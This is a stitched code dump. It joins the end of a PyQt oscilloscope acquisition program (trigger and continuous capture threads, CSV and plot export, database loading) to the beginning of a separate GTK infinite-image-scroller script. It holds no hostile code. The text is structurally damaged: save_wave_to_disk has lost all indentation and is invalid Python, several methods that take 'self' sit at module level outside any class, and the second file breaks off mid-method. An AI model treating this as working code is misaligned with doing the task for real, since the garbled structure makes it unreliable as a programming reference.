                    self.main_window.update()
            enable_buttons(True)

        def acquire_on_trig_thread():
            """
            Waits for the scope to trigger, then acquires and stores waveforms
            in the same way as the immediate acquisition thread.
            """
            self.lock.acquire()
            trigger_state = self.active_scope.getTriggerStatus()
            # Busy-wait until the scope triggers or a stop is requested.
            while trigger_state != 'TRIGGER' and not self.stop_flag.isSet() and not self.acquisition_stop_flag.isSet():
                trigger_state = self.active_scope.getTriggerStatus()
            if not self.stop_flag.isSet() and not self.acquisition_stop_flag.isSet():
                try:
                    self.active_scope.make_waveform()
                    wave = self.active_scope.next_waveform
                except AttributeError:
                    wave = None
                finally:
                    self.wave_acquired_flag.set()
                    if self.lock.locked():
                        self.lock.release()
                if not self.stop_flag.isSet() and not self.acquisition_stop_flag.isSet():
                    if wave is not None:
                        process_wave(wave)
            elif self.acquisition_stop_flag.isSet():
                self.update_status('Acquisition terminated')
                self.logger.info('Acquisition on trigger terminated.')
                if mode == 'trig':
                    self.acquisition_stop_flag.clear()
                self.wave_acquired_flag.set()  # have to set this for continuous acq to halt properly
                if self.lock.locked():
                    self.lock.release()
            else:
                self.update_status('Error on Waveform Acquisition')
                self.logger.info('Error on Waveform Acquisition.')
            if mode == 'trig':
                enable_buttons(True)

        def continuous_acquisition_thread():
            """
            Continually spawns trigger-acquisition threads until the stop
            signal is received.
            """
            while not self.stop_flag.isSet() and not self.acquisition_stop_flag.isSet():
                # Wait for the previous acquisition to finish before spawning
                # the next one.
                self.wave_acquired_flag.wait()
                if not self.acquisition_stop_flag.isSet():
                    acqThread = threading.Thread(target=acquire_on_trig_thread)
                    acqThread.start()
                    self.wave_acquired_flag.clear()
            self.acquisition_stop_flag.clear()
            self.update_status("Continuous Acquisiton Halted.")
            enable_buttons(True)
            # Resume the periodic connection check that was paused on entry.
            self.check_scope_timer = threading.Timer(5.0, self.check_scope)
            self.check_scope_timer.start()

        def enable_buttons(bool):
            """
            Disables/enables buttons that should not be active during acquisition.

            Parameters:
                :bool: True to enable buttons, false to disable.
            """
            self.acquisition_control.enable_buttons(bool)

        self.acquisition_stop_flag.clear()
        # Lazily create the database on first acquisition; all database access
        # must occur on this thread.
        if not self.database:
            self.database = Database()
            self.db_session = self.database.session()
        if mode == 'now':  # Single, Immediate acquisition
            enable_buttons(False)
            self.logger.info("Immediate acquisition Event")
            acquisition_thread = threading.Thread(target=immediate_acquisition_thread)
            acquisition_thread.start()
        elif mode == 'trig':  # Acquire on trigger
            enable_buttons(False)
            self.update_status("Waiting for trigger...")
            self.logger.info("Acquisition on trigger event")
            acquisition_thread = threading.Thread(target=acquire_on_trig_thread)
            acquisition_thread.start()
        elif mode == 'cont':  # Continuous Acquisition
            enable_buttons(False)
            # Pause periodic connection checking while acquiring continuously.
            self.check_scope_timer.cancel()
            self.logger.info('Continuous Acquisition Event')
            self.update_status("Acquiring Continuously...")
            self.wave_acquired_flag.set()
            acquisition_thread = threading.Thread(target=continuous_acquisition_thread)
            acquisition_thread.start()
    def find_scope(self):
        """
        Continually checks for connected scopes until one is found, then
        begins periodic connection checking via check_scope.
        """
        if not self.stop_flag.is_set():
            self.scopes = self.scope_finder.refresh().get_scopes()
            # Busy-loop until a scope appears or the program is shutting down.
            while not self.scopes:  # Check for scopes and connect if possible
                if self.stop_flag.isSet():
                    self.scopes = []
                    break
                self.lock.acquire()
                self.scopes = self.scope_finder.refresh().get_scopes()
                self.lock.release()
            if not self.stop_flag.isSet():  # Scope Found!
                self.active_scope = self.scopes[0]
                self.logger.info("Set active scope to %s", str(self.active_scope))
                self.scope_change_signal.emit(self.active_scope)
                self.update_status('Found ' + str(self.active_scope))
                self.main_window.setEnabled(True)
                # Hand off to periodic connection checking.
                self.check_scope_timer = threading.Timer(5.0, self.check_scope)
                self.check_scope_timer.start()
    def check_scope(self):
        """
        Periodically confirms that scopes are still connected. Reschedules
        itself every 5 seconds while connected; falls back to find_scope when
        the connection is lost.
        """
        if not self.stop_flag.isSet():
            self.lock.acquire()
            connected = self.scope_finder.check_scope(0)
            if self.lock.locked():
                self.lock.release()
            if not connected:
                self.scopes = []
                self.logger.info("Lost Connection to Oscilloscope(s)")
                self.update_status("Lost Connection to Oscilloscope(s)")
                self.main_window.setEnabled(False)
                self.check_scope_timer.cancel()
                # Resume continuous scope searching.
                self.find_scope_timer = threading.Timer(0.1, self.find_scope)
                self.find_scope_timer.start()
            elif not self.stop_flag.isSet():
                # Still connected: schedule the next periodic check.
                self.check_scope_timer = threading.Timer(5.0, self.check_scope)
                self.check_scope_timer.start()
    def close_event(self):
        """
        Executed on app close: signals all worker threads to stop, cancels the
        periodic connection check, and quits the Qt application.
        """
        self.logger.info('Closing ScopeOut. \n')
        self.stop_flag.set()
        self.continuous_flag.clear()
        self.check_scope_timer.cancel()
        self.quit()
def reset(self):
    """
    Called to reset waveform and plot.

    Clears plot/histogram widgets (when enabled), the wave list and histogram
    options, and drops any open database references.
    """
    if self.plot.isEnabled():
        self.plot.plot.reset_plot()
    if self.histogram.isEnabled():
        self.histogram.reset()
    for widget in (self.wave_column, self.histogram_options):
        widget.reset()
    self.update_status('Data Reset.')
    # Drop database handles; they are re-created on the next acquisition/load.
    self.db_session = self.database = None
def set_channel(self, channel):
    """
    Set data channel of active scope.

    Dispatches on the selected entry: a numeric channel index or 'Math'
    spawns a worker thread that talks to the scope under self.lock;
    'All' only toggles multi-channel mode without touching the hardware.

    Parameters:
        :channel: desired data channel (index into acquisition_control.data_channels)
    """
    channels = self.acquisition_control.data_channels

    def channel_thread():
        # Worker: performs the (blocking) scope call under the hardware lock.
        try:
            self.lock.acquire()
            if self.acquisition_control.scope.setDataChannel(channels[channel]):
                self.logger.info('Successfully set data channel %s', channels[channel])
                self.update_status('Data channel set to ' + channels[channel])
            else:
                self.logger.debug('Failed to set data channel set to ' + channels[channel])
                self.update_status('Failed to set data channel ' + channels[channel])
        except Exception as e:
            self.logger.error(e)
        finally:
            # Always signal completion and release the lock, even on error.
            try:
                self.channel_set_flag.set()
                if self.lock.locked():
                    self.lock.release()
            except Exception as e:
                self.logger.error(e)

    # Cleared here, set by the worker thread when the channel change finishes.
    self.channel_set_flag.clear()
    self.logger.info('Attempting to set data channel %s', channels[channel])
    # NOTE(review): buttons are re-enabled before the worker reports success --
    # confirm this optimistic enabling is intended.
    self.acquisition_control.continuous_acquire_button.setEnabled(True)
    self.acquisition_control.acquire_on_trigger_button.setEnabled(True)
    if channel in range(0, self.acquisition_control.scope.numChannels):
        self.multi_channel_acquisition = False
        set_channel_thread = threading.Thread(target=channel_thread)
        set_channel_thread.start()
    elif channels[channel] == 'All':
        self.logger.info("Selected all data channels")
        self.update_status("Selected all data channels")
        self.multi_channel_acquisition = True
    elif channels[channel] == 'Math':
        self.logger.info("selected Math data channel")
        self.update_status("selected Math data channel")
        self.multi_channel_acquisition = False
        set_channel_thread = threading.Thread(target=channel_thread)
        set_channel_thread.start()
        # No triggering in math mode
        self.acquisition_control.continuous_acquire_button.setEnabled(False)
        self.acquisition_control.acquire_on_trigger_button.setEnabled(False)
        self.acquisition_control.stop_acquisition_button.setEnabled(False)
def save_wave_to_disk(self, waveform=None):
"""
Called in order to save in-memory waveforms to disk.
Parameters:
:wave: a particular wave to save, if none is passed then all waves in memory are saved.
"""
if waveform:
try:
wave_directory = Config.get('Export', 'waveform_dir')
if not os.path.exists(wave_directory):
os.makedirs(wave_directory)
day_directory = os.path.join(wave_directory, date.today().isoformat())
if not os.path.exists(day_directory):
os.makedirs(day_directory)
default_file = 'Capture' + datetime.now().strftime('%m-%d-%H-%M-%S') + '.csv'
default_file = os.path.join(day_directory, default_file).replace('\\', '/')
file_name = QtWidgets.QFileDialog.getSaveFileName(self.main_window, 'Save As', default_file)[0]
with WaveformCsvFile(waveform, file_name) as file:
file.write()
self.logger.info('Waveform saved to ' + file_name)
self.update_status('Waveform saved to ' + file_name)
except Exception as e:
self.logger.error(e)
else:
wave_count = self.db_session.query(Waveform).count()
if wave_count:
try:
wave_directory = Config.get('Export', 'waveform_dir')
if not os.path.exists(wave_directory):
os.makedirs(wave_directory)
day_directory = os.path.join(wave_directory, date.today().isoformat())
if not os.path.exists(day_directory):
os.makedirs(day_directory)
default_file = 'Capture' + datetime.now().strftime('%m-%d-%H-%M-%S') + '.csv'
default_file = os.path.join(day_directory, default_file).replace('\\', '/')
file_name = QtWidgets.QFileDialog.getSaveFileName(self.main_window, 'Save As', default_file)[0]
with WaveformCsvFile(self.db_session.query(Waveform), file_name) as file:
file.write()
self.logger.info("%d waveforms saved to %s", wave_count, file_name)
self.update_status('Waveforms saved to ' + file_name)
except Exception as e:
self.logger.error(e)
else:
self.update_status('No Waveforms to Save')
def save_properties_to_disk(self, waveform=None):
    """
    Save the values of any number of a waveform's properties to disk.

    Parameters:
        :waveform: a Waveform, the properties of which are to be saved.
                   If none is present, the properties of all waveforms in memory are saved.
    """
    def make_properties_file():
        # Build <waveform_dir>/<ISO date>/Properties<timestamp>.csv, creating
        # directories as needed, then let the user confirm/change the path.
        # Returns '' if the dialog is cancelled.
        wave_directory = Config.get('Export', 'waveform_dir')
        if not os.path.exists(wave_directory):
            os.makedirs(wave_directory)
        day_directory = os.path.join(wave_directory, date.today().isoformat())
        if not os.path.exists(day_directory):
            os.makedirs(day_directory)
        default_file = 'Properties' + datetime.now().strftime('%m-%d-%H-%M-%S') + '.csv'
        default_file = os.path.join(day_directory, default_file).replace('\\', '/')
        file_name = QtWidgets.QFileDialog.getSaveFileName(self.main_window, 'Save As', default_file)[0]
        return file_name

    def write_properties(file_name, waves, fields):
        """
        Writes the selected properties of a list of Waveforms to a .csv file.

        Parameters:
            :file_name: the path to the output file.
            :waves: the list of Waveforms to be processed.
            :fields: an array containing the names of the selected properties.
        """
        try:
            with WaveformCsvFile(waves, file_name) as file:
                file.write_properties(fields)
            self.logger.info('Waveform properties saved to ' + file_name)
            self.update_status('Waveform properties saved to ' + file_name)
        except Exception as e:
            self.logger.error(e)

    if waveform:
        # NOTE(review): make_properties_file() runs immediately (showing the
        # save dialog) before the property-selection dialog opens -- confirm
        # this dialog ordering is intended.
        properties_dialog = sw.SelectPropertiesDialog(waveform)
        properties_dialog.property_signal.connect(partial(write_properties, make_properties_file(), [waveform]))
        properties_dialog.exec()
    else:
        if self.db_session:
            wave_list = self.db_session.query(Waveform).all()
            # NOTE(review): wave_list[0] raises IndexError if the session holds
            # no waveforms -- verify a session always contains at least one.
            properties_dialog = sw.SelectPropertiesDialog(wave_list[0])
            properties_dialog.property_signal.connect(partial(write_properties, make_properties_file(), wave_list))
            properties_dialog.exec()
        else:
            self.update_status('No waveforms to save.')
def save_plot_to_disk(self):
    """
    Save the currently displayed plot to disk.

    Builds a default <plot_dir>/<ISO date>/Plot<timestamp>.png path, prompts
    the user, then delegates to the plot widget's save_plot().
    """
    plot_directory = Config.get('Export', 'plot_dir')
    day_directory = os.path.join(plot_directory, date.today().isoformat())
    # makedirs creates plot_directory too if it is missing.
    if not os.path.exists(day_directory):
        os.makedirs(day_directory)
    default_file = 'Plot' + datetime.now().strftime('%m-%d-%H-%M-%S') + '.png'
    default_file = os.path.join(day_directory, default_file).replace('\\', '/')
    file_name = QtWidgets.QFileDialog.getSaveFileName(self.main_window, 'Save As', default_file)[0]
    if not file_name:  # user cancelled the save dialog
        return
    if self.plot.save_plot(file_name):
        self.update_status("Plot saved successfully")
    else:
        self.update_status("Error occurred while saving plot. Check log for details.")
def save_histogram_to_disk(self):
    """
    Save an image of the active histogram.

    Builds a default <plot_dir>/<ISO date>/Histogram<timestamp>.png path,
    prompts the user, then delegates to the histogram widget's save_plot().
    :return: None
    """
    plot_directory = Config.get('Export', 'plot_dir')
    day_directory = os.path.join(plot_directory, date.today().isoformat())
    # makedirs creates plot_directory too if it is missing.
    if not os.path.exists(day_directory):
        os.makedirs(day_directory)
    default_file = 'Histogram' + datetime.now().strftime('%m-%d-%H-%M-%S') + '.png'
    default_file = os.path.join(day_directory, default_file).replace('\\', '/')
    file_name = QtWidgets.QFileDialog.getSaveFileName(self.main_window, 'Save As', default_file)[0]
    if not file_name:  # user cancelled the save dialog
        return
    if self.histogram.save_plot(file_name):
        self.update_status("Plot saved successfully")
    else:
        self.update_status("Error occurred while saving plot. Check log for details.")
def update_status(self, message):
    """
    Print a message to the statusbar.

    Parameters:
        :message: The string to be printed.
    """
    # Emitted as a signal -- presumably so the GUI thread performs the actual
    # statusbar update, making this safe to call from worker threads (confirm).
    self.status_change_signal.emit(message)
def autoset_event(self):
    """
    Called when a scope autoset is requested.

    Spawns a worker thread that runs the scope's auto-set under the
    hardware lock so the GUI stays responsive.
    """
    def do_autoset():
        """
        Thread to execute the autoset.
        """
        # 'with' releases the lock even if autoSet() raises -- the original
        # acquire/release pair would leave it held on error.
        with self.lock:
            self.acquisition_control.scope.autoSet()

    self.logger.info("Starting autoSet")
    self.update_status("Executing Auto-set. Ensure process is complete before continuing.")
    threading.Thread(target=do_autoset, name='AutoSetThread').start()
def delete_wave(self, wave):
    """
    Removes the given waveform from the database.

    :param wave: the waveform to delete.
    """
    try:
        self.db_session.delete(wave)
        self.db_session.commit()
    except Exception as exception:
        # Roll the session back so it stays usable after a failed delete.
        self.logger.error(exception)
        self.db_session.rollback()
def load_database(self):
    """
    Connect to an old database file, and load its waves into memory if it is valid.

    Prompts the user for a database file, tears down the current session,
    loads all waveforms from the selected file and displays them.
    """
    # Initialized up-front so the except handler below can safely reference it
    # even when the failure happens before/inside the file dialog.
    database_path = ''
    try:
        default_file = Config.get('Database', 'database_dir')
        database_path = QtWidgets.QFileDialog.getOpenFileName(self.main_window, 'Open', default_file)[0]
        # Occurs if user hits cancel. (Equality check replaces the original
        # CPython-specific "is ''" identity comparison.)
        if not database_path:
            return
        self.update_status('Loading waves from ' + database_path)
        self.logger.info('Disconnecting from database')
        # clear old session
        if self.db_session:
            self.db_session.close()
            self.db_session = None
        # reset GUI
        self.reset()
        self.update_status('Loading waves from ' + database_path)
        self.logger.info('Loading waves from ' + database_path)
        # make new connection
        self.database = Database(database_path)
        if self.database.is_setup:
            self.db_session = self.database.session()
            # get waves
            loaded_waves = self.db_session.query(Waveform).all()
            if not len(loaded_waves):
                raise RuntimeError('Database contained no waves.')
            # display waves to user (plain loop: the comprehension was run
            # purely for its side effects).
            for wave in loaded_waves:
                self.wave_column.add_wave(wave)
            try:
                self.plot_wave(loaded_waves[-1])
            except ValueError as e:
                self.logger.info(e)
            except Exception as e:
                self.logger.error(e)
            self.histogram_options.update_properties(loaded_waves[-1])
            self.update_histogram()
            self.update_status('Wave loading complete.')
    except Exception as e:
        self.logger.error(e)
        self.update_status('Failed to load waves from ' + database_path)
def save_configuration(self):
    """
    Save the current settings to the configuration file.

    Collects (section, key, value) triples from the option widgets and writes
    them in one batch via Config.set_multiple.
    :return: None
    """
    self.logger.info('Saving configuration')
    settings = [('Peak Detection', 'detection_method',
                 self.wave_options.peak_detection_mode),
                ('Peak Detection', 'smart_start_threshold',
                 self.wave_options.smart.start_threshold_input.value()),
                ('Peak Detection', 'smart_end_threshold',
                 self.wave_options.smart.end_threshold_input.value()),
                ('Peak Detection', 'fixed_start_time',
                 self.wave_options.fixed.start_time_input.value()),
                ('Peak Detection', 'fixed_start_unit',
                 self.wave_options.fixed.start_time_unit_combobox.currentText()),
                ('Peak Detection', 'fixed_width_time',
                 self.wave_options.fixed.peak_width_input.value()),
                ('Peak Detection', 'fixed_width_unit',
                 self.wave_options.fixed.peak_width_unit_combobox.currentText()),
                ('Peak Detection', 'hybrid_start_threshold',
                 self.wave_options.hybrid.start_threshold_input.value()),
                ('Peak Detection', 'hybrid_width_time',
                 self.wave_options.hybrid.peak_width_input.value()),
                ('Peak Detection', 'hybrid_width_unit',
                 self.wave_options.hybrid.peak_width_units.currentText()),
                ('Peak Detection', 'voltage_threshold_start_edge',
                 self.wave_options.voltage_threshold.start_above_below_combobox.currentText()),
                ('Peak Detection', 'voltage_threshold_start_value',
                 self.wave_options.voltage_threshold.start_voltage_spinbox.value()),
                ('Peak Detection', 'voltage_threshold_start_unit',
                 self.wave_options.voltage_threshold.start_voltage_unit_combobox.currentText()),
                ('Peak Detection', 'voltage_threshold_end_edge',
                 self.wave_options.voltage_threshold.end_above_below_combobox.currentText()),
                ('Peak Detection', 'voltage_threshold_end_value',
                 self.wave_options.voltage_threshold.end_voltage_spinbox.value()),
                ('Peak Detection', 'voltage_threshold_end_unit',
                 self.wave_options.voltage_threshold.end_voltage_unit_combobox.currentText()),
                ('Histogram', 'default_property',
                 self.histogram_options.property_selector.currentText().lower().replace(' ', '_')),
                ('Histogram', 'number_of_bins',
                 self.histogram_options.bin_number_selector.value()),
                ('Acquisition Control', 'hold_plot',
                 self.acquisition_control.plot_held),
                ('Acquisition Control', 'show_peak',
                 self.acquisition_control.show_peak_window),
                ('Acquisition Control', 'data_channel',
                 self.acquisition_control.channel_combobox.currentText()),
                ('View', 'show_plot',
                 self.main_window.show_plot_action.isChecked()),
                # NOTE(review): 'show_histogram' reads save_histogram_action,
                # not a show_histogram_action -- possible copy/paste; verify
                # against the main window's action names.
                ('View', 'show_histogram',
                 self.main_window.save_histogram_action.isChecked())]
    Config.set_multiple(settings)
    self.update_status('Configuration saved.')
|
infinite-image-scroller.py | #!/usr/bin/env python3
import itertools as it, operator as op, functools as ft
import pathlib as pl, collections as cs, dataclasses as dc
import os, sys, re, logging, enum, textwrap, random, signal
import gi
gi.require_version('Gtk', '3.0')
gi.require_version('Gdk', '3.0')
gi.require_version('GLib', '2.0')
gi.require_version('GdkPixbuf', '2.0')
from gi.repository import Gtk, Gdk, GdkPixbuf, GLib
class LogMessage:
    '''Lazy str.format() log message: formatting is deferred until __str__ is called.'''

    def __init__(self, fmt, a, k):
        self.fmt, self.a, self.k = fmt, a, k

    def __str__(self):
        # Plain format strings without args pass through untouched,
        # so stray braces in literal messages do not raise.
        if not (self.a or self.k):
            return self.fmt
        return self.fmt.format(*self.a, **self.k)
class LogStyleAdapter(logging.LoggerAdapter):
    '''LoggerAdapter that enables str.format-style messages via LogMessage.'''

    def __init__(self, logger, extra=None):
        super().__init__(logger, extra or {})

    def log(self, level, msg, *args, **kws):
        if not self.isEnabledFor(level):
            return
        # Only exc_info is forwarded to Logger.log; everything else becomes
        # format kwargs for the message itself.
        log_kws = dict()
        if 'exc_info' in kws:
            log_kws['exc_info'] = kws.pop('exc_info')
        msg, kws = self.process(msg, kws)
        self.logger.log(level, LogMessage(msg, args, kws), **log_kws)
def get_logger(name):
    'Return a LogStyleAdapter-wrapped logger for *name*.'
    return LogStyleAdapter(logging.getLogger(name))

def dedent(text):
    'Dedent *text*, strip surrounding newlines, and append exactly one trailing newline.'
    return textwrap.dedent(text).strip('\n') + '\n'
@dc.dataclass
class Pos:
    '''Simple geometry record: x/y origin plus w/h extents
    (used for screen/monitor geometry in ScrollerWindow.place_window).'''
    x: int = 0
    y: int = 0
    w: int = 0
    h: int = 0
@dc.dataclass
class Image:
    '''Per-image state for one entry in the scroller box.'''
    path: str
    gtk: Gtk.Image
    pb_src: GdkPixbuf.Pixbuf = None # source-size pixbuf, only used with sync loading
    pb_proc: GdkPixbuf.Pixbuf = None # only used with helper module
    sz: int = None # requested scale size along the non-scroll dimension
    sz_chk: int = None # last window size this image was (re)scaled against
    displayed: bool = False # pixbuf has been set on the gtk widget
    scrolled: bool = False # scroll position already compensated for this image
class ScrollDirection(enum.IntEnum):
    # Encoded so code elsewhere can test bits: presumably bit1 = vertical axis,
    # bit0 = forward (right/down) -- confirm against init_widgets usage.
    left = 0
    right = 1
    up = 2
    down = 3

# Auto-scroll speed adjustment actions (values auto-numbered 1..3).
ScrollAdjust = enum.Enum('ScrollAdjust', 'slower faster toggle')
class ScrollerConf:
    '''All scroller settings as class attributes, grouped by "<section>_" name
    prefix; values can be overridden from ini files (see update_from_file).
    Underscore-prefixed attributes are internal and not exposed to config files.'''

    misc_app_id = 'net.fraggod.infinite-image-scroller'
    misc_no_session = False
    misc_box_spacing = 3
    misc_event_delay = 0.2 # debounce delay for scrolling and window resizing

    win_title = 'infinite-image-scroller'
    win_role = 'scroller-main'
    win_icon = ''
    win_pos = ''
    win_w = win_h = 0
    win_x = win_y = 0
    win_hints = win_type_hints = ''
    _win_size_default = 700, 500
    # CSS injected at startup: WASD/arrow scroll keybindings + transparent bg.
    _win_css = dedent('''
        @binding-set image-scroller-keys {
        bind "Up" { "scroll-child" (step-up, 0) };
        bind "Down" { "scroll-child" (step-down, 0) };
        bind "Left" { "scroll-child" (step-left, 1) };
        bind "Right" { "scroll-child" (step-right, 1) };
        bind "w" { "scroll-child" (step-up, 0) };
        bind "s" { "scroll-child" (step-down, 0) };
        bind "a" { "scroll-child" (step-left, 1) };
        bind "d" { "scroll-child" (step-right, 1) }; }
        #infinite-image-scroller scrolledwindow { -gtk-key-bindings: image-scroller-keys; }
        #infinite-image-scroller, #infinite-image-scroller * { background: transparent; }''')
    _win_hints_all = (
        ' focus_on_map modal resizable hide_titlebar_when_maximized'
        ' stick maximize fullscreen keep_above keep_below decorated'
        ' deletable skip_taskbar skip_pager urgency accept_focus'
        ' auto_startup_notification mnemonics_visible focus_visible' ).split()
    _win_type_hints_all = dict(
        (e.value_nick, v) for v, e in Gdk.WindowTypeHint.__enum_values__.items() if v )

    scroll_direction = 'down'
    scroll_auto = '' # (px, interval)
    scroll_adjust_k = 2
    scroll_queue_size = 10
    scroll_queue_preload_at = 0.6
    _scroll_auto_key_start = 1, 0.01

    image_proc_threads = 0
    image_opacity = 1.0
    image_brightness = 1.0
    image_scale_algo = 'bilinear'
    image_open_attempts = 3
    _image_proc_module = None

    # Key combos format is lowercase "[mod1 ...] key, ...", with modifier keys alpha-sorted
    # Use --debug option to see which exact key-sums get pressed
    keys_quit = 'q, control q, control w, escape'
    keys_scroll_faster = 'm'
    keys_scroll_slower = 'n'
    keys_scroll_toggle = 'p, space'

    _conf_sections = 'misc', 'win', 'wm', 'scroll', 'image', 'keys'
    _conf_file_name = 'infinite-image-scroller.ini'

    def __init__(self, **kws):
        # Reject unknown keys early instead of silently creating new attrs.
        for k, v in kws.items():
            if not hasattr(self, k): raise AttributeError(k)
            setattr(self, k, v)

    def update_from_files(self, *paths):
        '''Apply config files from XDG dirs, then XDG_CONFIG_HOME/~/.config, then *paths*.'''
        for p in filter(None, os.environ.get('XDG_CONFIG_DIRS', '').split(':')):
            p = pl.Path(p) / self._conf_file_name
            if p.exists(): self.update_from_file(p)
        p = os.environ.get('XDG_CONFIG_HOME')
        if p: p = pl.Path(p)
        elif p := os.environ.get('HOME'): p = pl.Path(p) / '.config'
        if p and (p := p / self._conf_file_name) and p.exists(): self.update_from_file(p)
        for p in paths: self.update_from_file(p)

    def update_from_file(self, path):
        '''Override matching attributes from one ini file; option types are
        inferred from each attribute's current value.'''
        import configparser
        log.debug('Updating configuration from file: {}', path)
        conf = configparser.ConfigParser(allow_no_value=True)
        conf.optionxform = lambda k: k # keep option-name case as-is
        with open(path) as src: conf.read_file(src)
        for sec in self._conf_sections:
            sec_pre = f'{sec}_'
            for k in dir(self):
                if not k.startswith(sec_pre): continue
                v = getattr(self, k)
                # Pick a typed getter matching the default value's type;
                # bool before int since bool is an int subclass.
                if isinstance(v, str): get_val = lambda *a: str(conf.get(*a))
                elif isinstance(v, bool): get_val = conf.getboolean
                elif isinstance(v, int): get_val = conf.getint
                elif isinstance(v, float): get_val = conf.getfloat
                else: continue
                # Accept both underscore and dash spellings of the option name.
                for kc in k, k.replace('_', '-'):
                    try: setattr(self, k, get_val(sec, kc[len(sec_pre):]))
                    except configparser.Error: pass
                    else: break

    def pprint(self, title=None):
        '''Print current settings grouped into ini-style [sections].'''
        cat, chk = None, re.compile(
            '^({})_(.*)$'.format('|'.join(map(re.escape, self._conf_sections))) )
        if title: print(f';; {title}')
        for k in self.__class__.__dict__.keys():
            m = chk.search(k)
            if not m: continue
            v, cat_chk = getattr(self, k), m.group(1).replace('_', '-')
            if cat_chk != cat:
                cat = cat_chk
                print(f'\n[{cat}]')
            if isinstance(v, bool): v = ['no', 'yes'][v]
            elif isinstance(v, int): v = int(v)
            k, v = m.group(2).replace('_', '-'), str(v).replace('\t', ' ')
            print(f'{k} = {v}')
class ScrollerWindow(Gtk.ApplicationWindow):
    '''Main window: a scrolled box of images fed from src_paths_iter.

    Images are either loaded synchronously via GdkPixbuf (no helper module) or
    processed in background threads via the optional pixbuf_proc helper module,
    with results handed back to the GLib main loop through a unix signal.'''

    def __init__(self, app, src_paths_iter, conf):
        super().__init__(name='infinite-image-scroller', application=app)
        self.app, self.src_paths_iter, self.conf = app, src_paths_iter, conf
        self.log = get_logger('win')
        self.set_title(self.conf.win_title)
        self.set_role(self.conf.win_role)
        if self.conf.win_icon:
            self.log.debug('Using icon: {}', self.conf.win_icon)
            self.set_icon_name(self.conf.win_icon)
        self.pp = self.conf._image_proc_module
        if self.pp:
            # Helper module tuple carries its own threading/queue modules.
            self.pp, threading, queue = self.pp
            self.thread_queue = queue.Queue()
            self.thread_list = list(
                threading.Thread( name=f'set_pixbuf.{n}',
                    target=self.image_set_pixbuf_thread, daemon=True )
                for n in range(self.conf.image_proc_threads) )
            for t in self.thread_list: t.start()
            # Worker threads signal the main thread via SIGUSR1 to collect results.
            self.thread_kill = threading.get_ident(), signal.SIGUSR1
            GLib.unix_signal_add( GLib.PRIORITY_DEFAULT,
                self.thread_kill[1], self.image_set_pixbuf_thread_cb )
            self.thread_results = list()
        self.init_widgets()

    def init_widgets(self):
        '''Build scrolled-box layout, apply CSS/WM hints, wire up events.'''
        css = Gtk.CssProvider()
        css.load_from_data(self.conf._win_css.encode())
        Gtk.StyleContext.add_provider_for_screen(
            Gdk.Screen.get_default(), css,
            Gtk.STYLE_PROVIDER_PRIORITY_APPLICATION )
        # NOTE(review): scroll_direction must be a ScrollDirection here (the
        # conf default is the string 'down') -- presumably converted by main().
        self.dim_scroll_v = self.dim_scale_w = bool(self.conf.scroll_direction.value & 2) # up/down
        self.dim_scroll_rev = not self.conf.scroll_direction.value & 1 # left/up
        self.scroll = Gtk.ScrolledWindow()
        self.scroll.set_policy(Gtk.PolicyType.AUTOMATIC, Gtk.PolicyType.ALWAYS)
        self.add(self.scroll)
        self.box = Gtk.VBox if self.dim_scroll_v else Gtk.HBox
        self.box = self.box(spacing=self.conf.misc_box_spacing, expand=True)
        self.scroll.add(self.box)
        self.box_images, self.box_images_init = cs.deque(), True
        self.ev_timers = dict()
        # Direction-agnostic accessors so the rest of the code never branches
        # on horizontal vs vertical scrolling.
        self.dim_scale, self.dim_scroll, self.dim_scroll_n = (
            ('width', 'height', 1) if self.dim_scroll_v else ('height', 'width', 0) )
        self.dim_box_alloc = getattr(self.box, f'get_allocated_{self.dim_scroll}')
        self.dim_box_pack = self.box.pack_start if not self.dim_scroll_rev else self.box.pack_end
        self.dim_scroll_translate = ( (lambda a,b: a)
            if not self.dim_scroll_rev else (lambda a,b: max(0, b - a)) )
        self.dim_scroll_for_image = lambda img: getattr(img.get_allocation(), self.dim_scroll)
        self.dim_scroll_for_pixbuf = lambda pb: getattr(pb, f'get_{self.dim_scroll}')()
        self.scroll_adj = ( self.scroll.get_vadjustment()
            if self.dim_scroll_v else self.scroll.get_hadjustment() )
        self.scroll_adj.connect( 'value-changed',
            ft.partial(self.ev_debounce, ev='scroll', cb=self.scroll_update) )
        # self.scroll_adj_init = bool(self.dim_scroll_rev)
        self.scroll_adj_image = None
        # Apply WM hints by probing for matching setter methods on the window.
        hints = dict.fromkeys(self.conf._win_hints_all)
        hints.update(self.conf.win_hints or dict())
        for k in list(hints):
            setter = getattr(self, f'set_{k}', None)
            if not setter: setter = getattr(self, f'set_{k}_hint', None)
            if not setter: setter = getattr(self, k, None)
            if not setter: continue
            v = hints.pop(k)
            if v is None: continue
            self.log.debug('Setting WM hint: {} = {}', k, v)
            if not setter.get_arguments(): # e.g. w.fullscreen()
                if v: setter()
                continue
            setter(v)
        assert not hints, ['Unrecognized wm-hints:', hints]
        self.set_type_hint(self.conf.win_type_hints)
        self.connect('composited-changed', self.set_visual_rgba)
        self.connect('screen-changed', self.set_visual_rgba)
        self.set_visual_rgba(self)
        self.set_default_size(*self.conf._win_size_default)
        # place_window runs once immediately and once more on the first
        # configure-event, then disconnects itself.
        self.place_window_ev = None
        self.place_window(self)
        self.place_window_ev = self.connect('configure-event', self.place_window)
        self.connect('key-press-event', self.window_key)
        self.connect( 'configure-event',
            ft.partial(self.ev_debounce, ev='set-pixbufs', cb=self.image_set_pixbufs) )
        self.scroll_timer = None
        if self.conf.scroll_auto: self.scroll_adjust(ScrollAdjust.toggle)

    # Debounce machinery: coalesce rapid events (scroll, resize) into one
    # delayed callback keyed by event name.
    def ev_debounce_is_set(self, ev): return ev in self.ev_timers
    def ev_debounce_clear(self, ev):
        timer = self.ev_timers.pop(ev, None)
        if timer is not None: GLib.source_remove(timer)
    def ev_debounce_cb(self, ev, cb, ev_args):
        self.ev_timers.pop(ev, None)
        cb(*ev_args)
    def ev_debounce(self, *ev_args, ev=None, cb=None):
        self.ev_debounce_clear(ev)
        self.ev_timers[ev] = GLib.timeout_add(
            self.conf.misc_event_delay * 1000, self.ev_debounce_cb, ev, cb, ev_args )

    def set_visual_rgba(self, w, *ev_data):
        '''Enable RGBA visual (for transparency) when the screen supports it.'''
        visual = w.get_screen().get_rgba_visual()
        if visual: w.set_visual(visual)

    def place_window(self, w, *ev_data):
        '''Resize/move the window per win_w/win_h/win_x/win_y, which can be
        pixel values, +/-offsets, or monitor names (M1, M2, ..., S = full screen).'''
        if self.place_window_ev:
            self.disconnect(self.place_window_ev)
            self.place_window_ev = None
        dsp, sg = w.get_screen().get_display(), Pos()
        geom = dict(S=sg)
